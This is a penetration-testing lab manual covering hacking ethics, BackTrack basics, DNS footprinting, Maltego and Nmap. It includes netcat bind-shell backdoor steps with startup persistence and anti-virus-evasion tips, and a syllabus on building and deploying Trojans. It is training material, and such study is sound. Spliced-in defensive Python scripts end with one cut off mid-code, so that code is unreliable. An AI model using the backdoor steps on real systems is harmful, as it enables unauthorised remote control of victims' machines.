St. Angelo's Professional Education Lab Manual v1.0 (Cyber Security Manual V1.0.pdf)

Contributing Authors: Rajesh Vishwakarma, Vinod Singh, Satish Jha, Lalit Jha

Table of Contents

Program Overview
  What is penetration testing?
  Objectives
  Pre-requisites
  Course Contents
    Module One: Art of Hacking
    Module Two: Scenario of Enterprise Security
    Module Three: Planning and Gathering Information
    Module Four: Social Engineering
    Module Five: Taking on the System
    Module Six: Attacking Passwords
    Module Seven: Malware, Rootkits and Trojans
    Module Eight: Getting Offensive
    Module Nine: Exploiting
    Module Ten: Report Writing and Supporting Compliance
NSD Penetration Testing Training Schedule
  Day 1 Schedule
  Day 2 Schedule
  Day 3 Schedule
  Day 4 Schedule
  Day 5 Schedule
Group Discussions
Team Activities
Case Studies
Assignments
Module One: Art of Hacking
  Group Discussion - Hacker Culture, Ethics and Rise of Anonymous
    Hacker Culture - Discuss the following questions
    Ethics - Discuss the following questions
    Rise of Anonymous
  Group Discussion: What is a System?
    Scenario
    Assignment
Module Two: Scenario of Enterprise Security
  Scenario
  Challenges
  Group Discussions
Module Three: Planning and Gathering Information
  Getting Started with BackTrack
    Logging into BackTrack
    Changing the default password
    Starting the graphical user interface
    Network configuration
    Starting various services in BackTrack
    Navigating the system
    Pentest directory
    Netcat overview
    Using netcat as a backdoor
    Exercises
  Footprinting
    What is DNS?
    Zone transfer
    dnsenum.pl
    Using dig
    Using whois
    Exercises
    Using Maltego
  Scanning
    Tools - IP scanning
    Nmap
  Enumeration
    SNMP enumeration
Steganography: Hiding Data within Data
  Exercises
Module Four: Social Engineering
  Social Engineering Concepts
  Dumpster Diving
Module Five: Taking on the System
  NTFS Alternate Streams
  Physical Access Attacks
  Resetting Linux Passwords
  Resetting Windows Passwords
  Using chntpw
  tcpdump (Network Analyzers)
  Wireshark
  ARP Spoofing (Ettercap)
Module Six: Attacking Passwords
  Hydra: Brute-force tool
  Using L0phtCrack to crack the hashes
Module Seven: Malware, Rootkits and Trojans
  Objectives
  Beast
  Trojan
  Building a Trojan using Beast
  Batch File Viruses
theHarvester.py
  Exercises
Module Eight: Getting Offensive
  Common Web Application Attacks
  Objective
  Tools
  Netcraft
  Configuring WebGoat
  SQL Injection
  Using Tamper Data
  Havij
  Cross-Site Scripting
  Basic Authentication Flaws
  Google Dorks
Module Nine: Exploiting
  Buffer Overflows
  Using OllyDbg
  Writing Shellcode
  Metasploit
  Exercises
Proxies and Tunneling Techniques
  Proxies
  Pivoting (SSH tunneling)
  Exercises


Program Overview

What is penetration testing?

A penetration test (often shortened to pentest) is a method of evaluating the security of a computer system or network by simulating an attack from malicious outsiders (who have no authorized means of accessing the organization's systems) and from malicious insiders (who have some level of authorized access).

The process involves an active analysis of the system for any potential vulnerabilities that could result from poor or improper system configuration, known and unknown hardware or software flaws, and operational weaknesses in processes or technical countermeasures. The analysis is carried out from the position of a potential attacker and can involve active exploitation of the security vulnerabilities found.

Security issues uncovered through the penetration test are presented to the system's owner. An effective penetration test couples this information with an accurate assessment of the potential impact on the organization and outlines a range of technical and procedural countermeasures to reduce the risk.

Objectives

By the end of the training, participants will be able to:
Design and create attack-plan methodologies
Understand the social engineering aspects used in attacks
Get an insight into enterprise security trends
Use current techniques to hack into systems and networks
Conduct regular audits and penetration tests in their company
Support the legal team with digital forensic evidence
Support standards-based compliance roadmaps for their organization
Support internal audit teams with IT security compliance

Pre-requisites

A background in A+ or MCSE is recommended
Good documentation and presentation skills
A strong attitude and a proactive approach to self-learning


Course Contents

Module One: Art of Hacking
History of hacking
Group Discussion: Hacker Culture, Ethics and Rise of Anonymous
The need for hacking
Group Discussion: What is a system?
Assignment: What are People, Process and Technology, and how do they impact security?
Knowing your enemy

Module Two: Scenario of Enterprise Security
Team Activity: Is IT security a cost center?
Technology vs Management
Case study: Security budget across different verticals
Team Activity: Requesting a new server in the DC
Case study: Insider trading
Making the enterprise: Business applications
Group Discussion: Why is it always possible to hack?

Module Three: Planning and Gathering Information
Making the plan
Information gathering approaches
Basics: Using BackTrack
Footprinting
Scanning
Enumeration
Group Discussion: What is your approach to gathering information?
Team Activity: Gathering information about an organization
Identifying weaknesses

Module Four: Social Engineering
Introduction to Social Engineering
Assignment: Watch movies on "hacking"
Why people are the weakest link in security
Assignment: What is body language?
Using social networking to gain trust effectively
Scripting in daily life
Assignment: Read the book "Games People Play"
Introduction to Reality Hacking
Group Discussion: Do you believe in astrology?
Case study: Using black magic and occult science to hack!
Assignment: Influence a friend to wear specific clothes on a given day by exploiting his/her beliefs
Team Activity: Using social engineering in daily life

Module Five: Taking on the System
Group Discussion: Windows vs Linux vs Mac
Introduction to systems
Assignment: Active Directory fundamentals
Hiding data: NTFS streams
Gaining root access
Privilege escalation
Man-in-the-middle attacks
Finding vulnerabilities

Module Six: Attacking Passwords
Password hacking
Attacking Windows and Linux passwords
Attacking application passwords
Group Discussion: Do you use the same passwords everywhere?
Case study: Most common passwords used
Using brute-force tools
Steganalysis concepts
Using rainbow tables
Team activity: Using online hash crackers
Default passwords of devices
Case study: Impact of default passwords on security
Using keyloggers to steal passwords
Team activity: Password recovery tools

Module Seven: Malware, Rootkits and Trojans
Group Discussion: How would you define malware?
Introduction to malware
Team activity: List the features you would look for in malware if you had to use it
Building a Trojan
Binding a Trojan to another file
Approaches for deploying a Trojan
Case study: Targeting victims with fake games and movies
Target harvesting
Rootkits and botnets
Case study: How do botnets work?
Team activity: Find the most popular malware affecting mobile platforms

Module Eight: Getting Offensive
Using data from the information-gathering activity for attacks
Attacking web applications
Team Activity: Setting up WordPress on localhost
Group discussion: What mistakes can affect web application security?
Web server security
Top 10 threats to web applications
Basic authentication attacks
SQL injection and cross-site scripting
LFI / RFI
Advanced Google search techniques
Group discussion: DoS attacks impacting organizations
Sniffing networks

Module Nine: Exploiting
Memory concepts and file formats for executables
Quick assembly introduction
Stack overflows from scratch
Introduction to debuggers such as IDA and OllyDbg
Introduction to shellcode
Introduction to exploit writing
Using exploit-db effectively
Creating a sample exploit
Metasploit: the big daddy
Introduction to msfencode/msfpayload
Manual shellcode writing and automatic shellcode generation
Introduction to fuzzing and fuzzing frameworks
Client-side exploitation techniques
Concepts and techniques of tunneling
Evading firewalls by hopping through tunnels using proxy servers
SMB fun: Windows and Linux
The art of exploit writing (Windows and Linux)
Different types of exploits, including off-by-one and race conditions
Anti-virus evasion
Setting up a lab

Module Ten: Report Writing and Supporting Compliance
Building professional reports: basics
Team activity: Create a VA report
Introduction to ISO 27001
Discussion: Security as a continuous process
Introduction to SIEM technologies
Group Discussion: Impact of log analysis and correlation
Importance of audits
Team Activity: Communicating with management
Team Activity: Forming a steering committee
Group discussion: What would you expect from VA reports as a CISO?
Group discussion: Importance of training
Group discussion: Patch management
Assignment: What is asset management?
Best practices and case study


Group Discussions

01 Hacker Culture, Ethics and Rise of Anonymous
02 What is a system?
03 Why is it always possible to hack?
04 What is your approach to gathering information?
05 Do you believe in astrology?
06 Windows vs Linux vs Mac
07 Do you use the same passwords everywhere?
08 How would you define malware?
09 What mistakes can affect web application security?
10 DoS attacks impacting organizations
11 Security as a continuous process
12 Impact of log analysis and correlation
13 What would you expect from VA reports as a CISO?
14 Importance of training
15 Patch management

Team Activities

01 Is IT security a cost center?
02 Requesting a new server in the DC
03 Gathering information about an organization
04 Using social engineering in daily life
05 Using online hash crackers
06 Password recovery tools
07 List the features you would look for in malware if you had to use it
08 Find the most popular malware affecting mobile platforms
09 Setting up WordPress on localhost
10 Create a VA report
11 Communicating with management
12 Forming a steering committee

Case Studies

01 Security budget across different verticals
02 Insider trading
03 Using black magic and occult science to hack!
04 Most common passwords used
05 Impact of default passwords on security
06 Targeting victims with fake games and movies
07 How do botnets work?

Assignments

01 What are People, Process and Technology, and how do they impact security?
02 Watch movies on "hacking"
03 What is body language?
04 Read the book "Games People Play"
05 Influence a friend to wear specific clothes on a given day by exploiting his/her beliefs
06 Active Directory fundamentals
07 What is asset management?


Module One: Art of Hacking

India is known for its capability in Information Technology. It is also a fact, however, that India is one of the countries with the highest rate of cybercrime incidents and computer virus infections. This affects not only individuals but also businesses and the Government, which are regular targets of coordinated hacking attacks.

But what is the history of hacking? How did it all start?

Your instructor will walk you through this amazing history. Meanwhile, visit these links:

http://en.wikipedia.org/wiki/Timeline_of_computer_security_hacker_history
http://freehacking.org/hackerhistory/

Group Discussion - Hacker Culture, Ethics and Rise of Anonymous

Hacker Culture - Discuss the following questions:
1. What do you think hacker culture is? Who defines it?
2. How would you describe a hacker?
3. What perception do people in general have of hackers?
4. What do you think the trends in hacker culture have been over the last five years?
5. List at least five significant aspects that you feel define the cult and culture of hackers.
6. Discuss the Aaron Swartz case: what do you think about the case and the fairness of the laws related to hacking?
7. Submit a one-page write-up (300 words or more) on your view of the Aaron Swartz case, hacker culture and its importance to your instructor.

Ethics - Discuss the following questions:
1. What are ethics? Do you feel hackers have ethics as part of their hacker culture?
2. How are ethics different from a code of conduct?
3. How do ethics play a role in defining a white-hat, black-hat or grey-hat hacker?
4. What do you think is the most important ethic that hackers need to follow?
5. If you find a vulnerability in a company's website while surfing the Internet, what action will you take, and how will your action be ethical?
6. What do you think of WikiLeaks? How ethical do you think the concept of WikiLeaks is, and what is its impact?
7. Submit a one-page write-up (300 words or more) on your view of WikiLeaks and computer ethics to your instructor.

Rise of Anonymous
1. What do you think Anonymous is all about?
2. Do you think the actions of Anonymous are ethical?
3. What do you think the impact of Anonymous is on the freedom of the Internet?
4. What are the legal risks of starting such groups and getting caught?
5. Does society derive any benefit, or is there a larger good, from the actions of such groups?
6. Submit a one-page write-up (300 words or more) on the role of hacker groups, hacktivism and their potential impact on the Internet.

Group Discussion: What is a System?
1. What are the components of a system? List the components you can think of and give the list to your instructor.
2. What is the definition of a system? Is it a computer? A mouse? A CPU? A process?
3. What are networks? What makes up a network?
4. List some devices required to create a network and try to explain in general terms how each of them works.
5. What is the client/server model?
6. What are web applications? What are the components of a web application?
7. When you open a web page, what actions happen behind the scenes to deliver the content to you?

Scenario:
You need to send a letter from one building to another, but the road is full of terrorists who will shoot you if you step outside. What approach will you take to deliver the letter, and why?

Assignment
What are People, Process and Technology, and how do they impact security?
Submit your assignment as a Word document of approximately 300 words or more to your instructor.


Module Two: Scenario of Enterprise security

Module Two: Scenario of Enterprise Security

In this activity, you are going to try and understand real life challenges in running organizations vs

priority of security.

Scenario

Background - First Company

You are working for ACME SOFT - a start-up software development with a budget of INR Ten Lacs for

one year. The company has 7 employees as follows:

Employee 1: Founder / Managing Director – responsible for finances

Employee 2: Project Manager / Developer – responsible for project completion

Employee 3: IT Manager – responsible for IT infra and Security

Employee 4,5,6,7 - Developers

ACME SOFT has developed a software product that costs Rs.25000 per licensing. The company is

planning to hire more employees for expanding their operations and developing new product that will

take 6 months to create.

Background - Second Company

You are working for ACME SECURE - a start-up security consulting company with a capital of INR Ten

Lacs. The company has 6 employees as follows:

Employee 1: Founder / Managing Director – responsible for finances

Employee 2: Project Manager / Pre-sales Manager – responsible for Sales & business

Employee 3: Security Engineer – responsible to support after sales, deploy product etc

Employee 4,5,6 - Junior Staff

ACME SECURE have developed a security product that costs Rs.9000 to make for each software

license. It can make software more secure from hacking and is very useful for software development

companies.

Challenges

Task One: The group leader of each company must allocate budget for:

Salary for employees

Budget for IT Infrastructure

Budget for Marketing

Budget for running company / taxes

Task Two: ACME SECURE has to give a demonstration to ACME SOFT about their product and sell it.

Group Discussions:

1. How will ACME SECURE sell this product? What are the challenges?

2. Who needs to be convinced in ACME SOFT to buy the product?

3. How will ACME SOFT manage and plan the budget for new employees for 6 months with the given capital? Will this be impacted if they plan to buy the security product from ACME SECURE?

4. Why will ACME SOFT require the security product?

5. What are the risks of ACME SOFT not buying the security product?

6. What are the financial risks if ACME SOFT buys the security product? Is it a priority?

7. How will ACME SECURE sustain itself if ACME SOFT does not buy it?

8. Do you think the ACME SOFT IT Manager can do his job properly if he does not get the required hardware and software for the security of the company's products and data?

9. Do you think the ACME SOFT MD will care about security if he does not make enough revenue to run the company and pay employees on time?

10. Do you think security is a cost center? Why?

Module Three: Planning and Gathering Information

Getting Started With Backtrack:

Objectives: At the end of this module you should be able:

To work with the BackTrack Linux OS.

To use various Linux commands.

To locate tools, software and scripts used in penetration testing.

Logging into backtrack:

Once you boot into backtrack, you can login with the below information:

The default user name is: root

The default password is: toor

Changing default password

You can change the password using the command:

root@bt:~# passwd

Starting the Graphical User Interface

In order to get into a GUI interface you'll have to execute the following command:

root@bt:~# startx

Network configuration:

Setting up IP manually: We can set the IP address using the GUI, but it is better to use the command line once you are familiar with it.

First, check for available Ethernet devices by executing the command:

root@bt:~# ifconfig

In order to make the following changes:

IP Address - 192.168.1.11

Default Gateway - 192.168.1.1

DNS server - 192.168.1.1

We will have to execute the following commands (where eth0 is the network interface name):

Step 1:

root@bt:~# ifconfig eth0 192.168.1.11

Step 2:

root@bt:~# route add default gw 192.168.1.1

Step 3:

root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf

To enable the device, use the following command:

root@bt:~# ifup eth0

and to disable it:

root@bt:~# ifdown eth0

Starting various services in Backtrack

Backtrack has various services such as Apache, SSH, MySQL, VNC, etc.

To start a service such as SSH, you can use the service init scripts.


Starting SSH:

Step 1: Generating SSH key

root@bt:~# sshd-generate

Step 2: Starting SSH service

root@bt:~# /etc/init.d/ssh start

To stop the service:

root@bt:~# /etc/init.d/ssh stop

Apache:

Starting Apache

root@bt:~# /etc/init.d/apache2 start

Stopping Apache

root@bt:~# /etc/init.d/apache2 stop

Navigating the System

When you first log in, your current working directory is your home directory.

To find out what is in your home directory, type

root@bt:~# ls


The ls command (lowercase L and lowercase S) lists the contents of your current working directory.

cd (change directory): used to change the working directory. To change the working directory, type:

root@bt:~# cd

mkdir (make directory)

The command is used to create a new directory. To create a new directory, type:

root@bt:~# mkdir <directory name>

cp (copy)

The command is used to copy files. The syntax is:

root@bt:~# cp SOURCE DEST

cat (concatenate)

cat is one of the most frequently used commands. It has three related functions with regard to text files: displaying them, combining copies of them and creating new ones.

locate

The locate command is often the simplest and quickest way to find the locations of files and directories.

The basic syntax for locate is:

locate [options] name(s)

Example of the command: (screenshot not reproduced)

Pentest Directory

Most of the tools are located either in the path or in the /pentest directory. The tools in the /pentest directory are categorized and subcategorized by attack vector and tool.

Some of the important directories are:

./backdoors: This folder contains various backdoors which can be used to maintain access in a target system.

./exploits: This folder contains various exploits for Windows, Linux, etc., written in various languages like Perl, Python, etc., which can be used to hack into a system.

./passwords: This folder contains password cracking tools.

Netcat overview

Netcat, also called "the Swiss army knife", is a utility used to read and write data across TCP and UDP networks.

Using netcat an attacker can place a backdoor that will allow him/her to telnet into a DOS shell.

In fact netcat can be used as a port scanner, banner grabbing tool, Trojan and backdoor. The power of netcat can be judged from the fact that it can act as both server and client, and it is often not detected by anti-virus; even if it is detected, its source code is available, so adding some unnecessary code changes its signature and lets it bypass anti-virus. This tutorial is aimed at complete beginners to netcat.

We can also use netcat as a banner grabbing tool, meaning it can grab the application version:

C:\>nc -v -n 10.42.43.12 80

-v - verbose output

-n - do not resolve DNS, keep all addresses numerical

To use netcat as a backdoor:

First, get the netcat executable file (nc.exe) into the target's c:\windows\system32 directory. Then make a batch file with the following command in it:

nc -L -d -p <port No> -t -e cmd.exe

Tip: One trick is to make this batch file an autorun/startup script, so that whenever the system starts the script runs automatically. There are lots of other tricks that can be used. Just find your way. Once that batch file is run, you can telnet or use netcat in client mode to connect to it.

Here's how to use netcat to connect to it:

In a command prompt, give the command

C:\WINDOWS\>nc -v <IP Address> <port No>

Once you are connected to that port on the victim's computer, you'll have a command prompt from which you can give any command on the victim's computer.
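As an added, defender-side example (not part of the manual), the Python script below scans the lines of a startup batch file for exactly the netcat bind-shell pattern described above and distinguishes it from ordinary client use such as the banner grab earlier; the sample script content, the function names and the nc/ncat name list are this example's own assumptions.

```python
"""Flag netcat bind-shell commands in startup/batch script lines (added example)."""
import re
import shlex

# Names netcat is commonly installed under; "ncat" is the Nmap rewrite (assumed list).
NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}
COMMENT_RE = re.compile(r"^(rem\b|::|#)", re.IGNORECASE)


def classify_netcat_line(line):
    """Return a finding dict if `line` runs netcat as a bind shell, else None.

    A bind shell needs a listen flag (-l, or -L, which on the Windows build
    re-listens after every disconnect) together with an exec flag (-e or -c)
    naming the program the connection is handed to, e.g. cmd.exe.
    """
    stripped = line.strip()
    if not stripped or COMMENT_RE.match(stripped):
        return None  # blank and comment lines never execute
    try:
        argv = shlex.split(stripped, posix=False)
    except ValueError:
        argv = stripped.split()
    if not argv:
        return None
    # Drop any directory prefix (Windows or POSIX style) from the program name.
    prog = re.split(r"[\\/]", argv[0])[-1].lower()
    if prog not in NETCAT_NAMES:
        return None

    listen = persistent = False
    port = executable = None
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("-") and len(arg) > 1 and arg[1:].isalpha():
            letters = arg[1:]  # handles combined flags such as "-Ld" too
            if "l" in letters or "L" in letters:
                listen = True
            if "L" in letters:
                persistent = True
        if arg in ("-e", "-c") and i + 1 < len(argv):
            executable = argv[i + 1]
            i += 1
        elif arg == "-p" and i + 1 < len(argv):
            port = argv[i + 1]
            i += 1
        i += 1
    if not (listen and executable):
        return None  # ordinary client or plain listener use is not a bind shell
    return {"line": stripped, "port": port, "executable": executable,
            "persistent": persistent}


def scan_script(text):
    """Check every line of a script; returns findings with their line numbers."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        finding = classify_netcat_line(line)
        if finding:
            finding["line_number"] = number
            findings.append(finding)
    return findings


# Constructed sample of a startup batch file for this example.
SAMPLE_STARTUP_BAT = r"""@ECHO OFF
REM nc -L -p 4444 -e cmd.exe   (commented out, must not be flagged)
nc -L -d -p 4444 -t -e cmd.exe
C:\Windows\System32\nc.exe -l -p 80 -e cmd.exe
nc -v -n 10.42.43.12 80
start notepad.exe
"""

if __name__ == "__main__":
    for f in scan_script(SAMPLE_STARTUP_BAT):
        print("line %(line_number)d: bind shell on port %(port)s running %(executable)s "
              "(persistent=%(persistent)s)" % f)
```

Point it at the contents of the Startup folder and Run-key scripts when reviewing a host; a netcat binary in system32 that nobody installed is itself worth a finding.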

Exercises:

Use the locate command to locate the theHarvester tool.

Use the find command to find the .lst files in BackTrack.

Name at least five tools in each directory of /pentest.

Create a text file using cat and use cat to display it on screen.

Foot-printing:

Objectives: At the end of this module you should be able:

To learn techniques used to gather information on a target computer system.

To effectively use DNS and Network information gathering tools.

To gather public information from various search engines and websites.

To profile a target organization/network effectively.

What is DNS:

The domain name system (DNS) is the way that Internet domain names are located and translated into Internet Protocol addresses. A domain name is a meaningful and easy-to-remember "handle" for an Internet address.

DNS servers hold a lot of information about a domain's IP addresses, which is essential when attacking a system. Knowing all the IP addresses of a particular domain increases the success rate of an attack.

Zone Transfer:

A zone transfer is the term used to refer to the process by which the contents of a DNS zone file are copied from a primary DNS server to a secondary DNS server.

A zone transfer takes place:

When starting the DNS service on the secondary DNS server.

When the refresh time expires.

When changes are saved to the primary zone file and there is a Notify List.

A zone transfer should take place from a primary DNS server to a secondary DNS server only where the secondary DNS server is a registered DNS server. But in certain cases, where the primary DNS server fails to check the authenticity of the secondary server, it will transfer the zone to any system that requests a zone transfer.

A zone transfer can be performed with any of the following tools. There are also automated scripts in our BackTrack OS which extend and simplify the process of performing a zone transfer.

o Dig

o Host

o Dnsenum.pl <Backtrack Tool>

o Fierce.pl <Backtrack Tool>

The following diagram (not reproduced) shows how a zone is transferred from the primary to the secondary DNS server.

Dnsenum.pl

This tool automatically finds out information about DNS, including name servers, mail servers and zone transfers.

The tool is located at /pentest/enumeration/dns/dnsenum/

# dnsenum <domain>

Using Dig

Domain Information Groper (dig) is a network administration command-line tool for querying Domain Name System (DNS) name servers for any desired DNS records.

Dig is useful for network troubleshooting and for educational purposes. Dig can operate in interactive command-line mode or in batch mode by reading requests from an operating system file.

When a specific name server is not specified in the command invocation, it will use the operating system's default resolver, usually configured via the /etc/resolv.conf file. Without any arguments it queries the DNS root zone.

# dig <example.com>

Example of the dig command: (screenshot not reproduced)

To perform a zone transfer, use the following command (the name server is given with a leading @, and it is the zone name, not a host such as www, that is transferred):

# dig @<nameserver> example.com AXFR

host: example: host <example.com>

The host command returns the Internet address of a host machine when the <HostName> parameter is specified, and the name of the host when the Address parameter is specified.

Depending on the configuration of the name resolution service, the host command may also display any aliases associated with the <HostName> parameter.

The host command can also be used to perform a zone transfer by using -l as an option:

host -l <domain name> <nameserver>
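The following Python script is an added example (not from the manual): it parses the text printed by dig for an AXFR request so that an administrator can check whether their own authoritative server hands the zone to an unauthorised client, and summarises what would leak (record counts, hosts with RFC 1918 addresses); the sample dig output and the function names are constructed for this example.

```python
"""Parse `dig @<nameserver> <zone> AXFR` output and report what a transfer exposes."""
import ipaddress

# RFC 1918 blocks checked explicitly: ipaddress's is_private also counts the
# documentation ranges (192.0.2.0/24 etc.) as private, which is not what we want.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_axfr(dig_output):
    """Return a dict describing the transfer attempt.

    allowed        True if the server handed over the whole zone
    records        list of (name, ttl, class, type, rdata) tuples
    private_hosts  names whose A record points into RFC 1918 space
    by_type        record count per RR type
    """
    records = []
    failed = False
    for line in dig_output.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith(";"):          # dig's own comment/status lines
            if "Transfer failed" in line:
                failed = True
            continue
        fields = line.split(None, 4)      # name ttl class type rdata
        if len(fields) < 5 or fields[2] != "IN":
            continue
        name, ttl, cls, rtype, rdata = fields
        records.append((name, int(ttl), cls, rtype, rdata))

    # A complete AXFR is bracketed by the zone's SOA record at start and end.
    allowed = (not failed and len(records) >= 2
               and records[0][3] == "SOA" and records[-1][3] == "SOA")
    private_hosts = []
    by_type = {}
    for name, _ttl, _cls, rtype, rdata in records:
        by_type[rtype] = by_type.get(rtype, 0) + 1
        if rtype == "A":
            addr = ipaddress.ip_address(rdata)
            if any(addr in net for net in RFC1918):
                private_hosts.append(name)
    return {"allowed": allowed, "records": records,
            "private_hosts": private_hosts, "by_type": by_type}


def axfr_report(dig_output):
    """One-paragraph verdict, as you would want it when auditing your own servers."""
    result = parse_axfr(dig_output)
    if not result["allowed"]:
        return "zone transfer refused (expected for an unauthorised client)"
    lines = ["zone transfer ALLOWED: %d records exposed" % len(result["records"])]
    for rtype, count in sorted(result["by_type"].items()):
        lines.append("  %-5s %d" % (rtype, count))
    if result["private_hosts"]:
        lines.append("  internal hosts leaked: " + ", ".join(result["private_hosts"]))
    return "\n".join(lines)


# Constructed dig output for a server that wrongly allows AXFR to anyone.
SAMPLE_AXFR_ALLOWED = """\
; <<>> DiG 9.16.1 <<>> @ns1.example.com example.com AXFR
;; global options: +cmd
example.com.\t\t3600\tIN\tSOA\tns1.example.com. hostmaster.example.com. 2024010101 7200 900 1209600 3600
example.com.\t\t3600\tIN\tNS\tns1.example.com.
example.com.\t\t3600\tIN\tMX\t10 mail.example.com.
www.example.com.\t3600\tIN\tA\t203.0.113.10
intranet.example.com.\t3600\tIN\tA\t10.0.0.5
example.com.\t\t3600\tIN\tSOA\tns1.example.com. hostmaster.example.com. 2024010101 7200 900 1209600 3600
;; Query time: 3 msec
;; XFR size: 6 records (messages 1, bytes 231)
"""

# Constructed dig output for a server that refuses the transfer.
SAMPLE_AXFR_REFUSED = """\
; <<>> DiG 9.16.1 <<>> @ns1.example.com example.com AXFR
;; global options: +cmd
; Transfer failed.
"""

if __name__ == "__main__":
    print(axfr_report(SAMPLE_AXFR_ALLOWED))
    print(axfr_report(SAMPLE_AXFR_REFUSED))
```

The server-side fix is to restrict transfers to the registered secondaries (in BIND, the allow-transfer option, ideally combined with TSIG-signed requests) and to re-run the check from an outside address afterwards.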

Using Whois

Whois is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, but is also used for a wider range of other information. The protocol stores and delivers database content in a human-readable format.

The following image (not reproduced) shows the details output by the whois command.

WHOIS example: whois <example.com>

Apart from these tools, we can use other online tools available from the following sites:

http://remote.12dt.com/

www.yougetsignal.com

www.domainresearchtool.com

www.netcraft.com

www.domaintools.com

www.who.is

www.hackersforcharity.org

http://www.exploit-db.com/google-dorks/

Exercises:

Use the following tools and explain the functioning with an example:

○ Ping

○ Traceroute

○ NSLookup

○ Netcraft

Using Maltego:


Maltego is an information gathering tool that allows you to visually see relationships. Maltego allows you to enumerate network and domain information like:

Domain Names

Whois Information

DNS Names

Netblocks

IP Addresses

Maltego also allows you to enumerate people information like:

Email addresses associated with a person's name

Web sites associated with a person's name

Phone numbers associated with a person's name

Social groups associated with a person's name

Companies and organizations associated with a person's name

Maltego also allows you to:

Do simple verification of email addresses

Search blogs for tags and phrases

Identify incoming links for websites

Extract metadata from files from target domains

Maltego can be used for the information gathering phase of all security related work. It will save you time and will allow you to work more accurately and smarter. Maltego aids you in your thinking process by visually demonstrating interconnected links between searched items.

Maltego provides you with a much more powerful search, giving you smarter results. If access to "hidden" information determines your success, Maltego can help you discover it.

Maltego supports 4 types of layout algorithms:

Block layout. This is the default layout and is also used during mining. This layout is discussed in more depth later.

Hierarchical layout. Think of this as a tree-based layout, like a file manager.

Centrality layout. Nodes that are most central to the graph (e.g. most incoming links) appear in the middle with the other nodes scattered around them.

Organic layout. Nodes are packed tightly together in such a way that the distance between each node and all the other nodes is minimized.

We can start by taking a name and using Maltego to enumerate possible email addresses. The first thing we have to do is input our search terms: First Name: XYZ, Surname: ZYX. You can also use additional search terms like Country Code and Additional Search Term.

The result is a neat graph showing us the relationship of the entity to other different entities and their information.

Exercises:

Students should work with Maltego from their BackTrack OS and perform transforms on at least three different entities.

Document every finding for each entity.

Warning: Students should not run all transforms at once, as this consumes a lot of bandwidth. You should not cause any trouble for the owner of the entity!

Scanning:

Port scanning is one of the most common reconnaissance techniques used by testers to discover vulnerabilities in the services listening on well-known ports.

Once you've identified the IP address of a target system through footprinting, you can begin the process of port scanning: looking for holes in the system through which you -- or a malicious intruder -- can gain access.

A typical system has 2^16 - 1 port numbers, each available as both a TCP and a UDP port, that can be used to gain access if unprotected.

Scanning consists of three phases:

1. IP scanning.

2. Port scanning.

3. Vulnerability scanning.

IP scanning: Scanning for live systems

Examples:

○ Angry IP scanner

○ Unicornscan

○ Advanced IP scanner

Port scanning: Scanning the systems for open ports

Examples:

○ Nmap

○ Autoscan

○ Netifera

Vulnerability scanning: Scanning the system for any vulnerability in the services.

Examples:

○ Nessus

○ Core Impact

○ Acunetix

Tools – IP scanning:

Angry IP Scanner: (screenshot not reproduced)

Nmap:

The best in the market for port scanning, Nmap gives us information about the services running on a specific port, operating system details, NetBIOS information, shared folders and lots more.

Steps to use the program:

Open Zenmap (Graphical User Interface for Nmap).

Provide the Target IP or Range.

Select the Profile to scan.

Click on Scan to start the scan.

You can also provide any extra options to the current scan in the Command Box.

Results can be viewed in the Nmap Output Pane.

Nmap - Interesting options

● -f fragments packets

● -D Launches decoy scans for concealment

● -I IDENT Scan – finds owners of processes (on Unix systems)

● -b FTP Bounce

Port Scan Types

● TCP Connect scan

● TCP SYN scan

● TCP FIN scan

● TCP Xmas Tree scan (FIN, URG, and PUSH)

● TCP Null scan

● TCP ACK scan

● UDP scan
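As an added example (not from the manual), this Python script shows how a defender would recognise the scan types listed above from the TCP flags of incoming probes and flag a source that touches many ports in a short window; the record format, the thresholds and the sample records are constructed for this example.

```python
"""Recognise port-scan probe types and scanning sources from connection records."""
import re
from collections import Counter, defaultdict

# Probe signatures from the "Port Scan Types" list, keyed by the set of TCP flags.
SCAN_SIGNATURES = {
    frozenset("S"): "TCP SYN scan",        # a TCP Connect scan also opens with a bare SYN
    frozenset("F"): "TCP FIN scan",
    frozenset("FPU"): "TCP Xmas Tree scan",  # FIN, PUSH and URG together
    frozenset(): "TCP Null scan",          # no flags at all
    frozenset("A"): "TCP ACK scan",
}

# Constructed record format: "<seconds> <src> > <dst>:<dport> [<flags>]", "-" = no flags.
LOG_RE = re.compile(r"^(\d+(?:\.\d+)?)\s+(\S+)\s+>\s+(\S+):(\d+)\s+\[([A-Z-]*)\]$")


def parse_log(text):
    """Return (timestamp, src, dst, dport, flags) tuples; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts, src, dst, dport, flags = m.groups()
        events.append((float(ts), src, dst, int(dport), flags.replace("-", "")))
    return events


def probe_type(flags):
    """Name the scan type a single probe matches, by its flag set."""
    return SCAN_SIGNATURES.get(frozenset(flags), "other")


def detect_port_scans(events, window=60.0, threshold=10):
    """Report sources touching >= threshold distinct ports within `window` seconds.

    Uses a sliding window per source and keeps the widest burst seen; the
    reported scan type is the most common probe type inside that burst.
    """
    by_src = defaultdict(list)
    for ts, src, _dst, dport, flags in events:
        by_src[src].append((ts, dport, flags))
    findings = []
    for src, probes in by_src.items():
        probes.sort()
        best_ports, best_types = set(), Counter()
        left = 0
        for right in range(len(probes)):
            while probes[right][0] - probes[left][0] > window:
                left += 1
            burst = probes[left:right + 1]
            ports = {p[1] for p in burst}
            if len(ports) >= threshold and len(ports) > len(best_ports):
                best_ports = ports
                best_types = Counter(probe_type(p[2]) for p in burst)
        if best_ports:
            findings.append({"src": src, "distinct_ports": len(best_ports),
                             "scan_type": best_types.most_common(1)[0][0]})
    return findings


# Constructed sample: a SYN sweep of 12 ports, an Xmas probe of 10 ports, normal browsing.
SAMPLE_LOG = "\n".join(
    ["%d 192.168.1.50 > 192.168.1.10:%d [S]" % (t, p)
     for t, p in enumerate([21, 22, 23, 25, 53, 80, 110, 135, 139, 443, 445, 3389])]
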